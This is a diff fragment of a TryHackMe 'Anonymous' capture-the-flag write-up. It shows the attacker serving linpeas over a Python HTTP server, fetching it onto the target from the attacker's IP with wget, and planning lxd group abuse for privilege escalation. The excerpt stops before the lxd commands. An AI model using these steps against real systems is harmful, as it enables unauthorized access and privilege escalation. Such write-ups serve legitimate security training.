CSbyGB/pentips/writeups/THM-Anonymous.md

 - Let's get linpeas in our target `wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh`
 - `python3 -m http.server 80`
 - From our target `wget http://10.13.22.56/linpeas.sh` and `chmod +x linpeas.sh`
 - We are part of interesting groups such as lxd sudo and adm.
-However sudo -l does not give anything back.
+However sudo -l does not give anything back (we get prompted for the password).
 Let's try to abuse lxd and follow [this article](https://steflan-security.com/linux-privilege-escalation-exploiting-the-lxc-lxd-groups/)
 - To summarize here are the commands I ran (using the blog post as reference)

 ```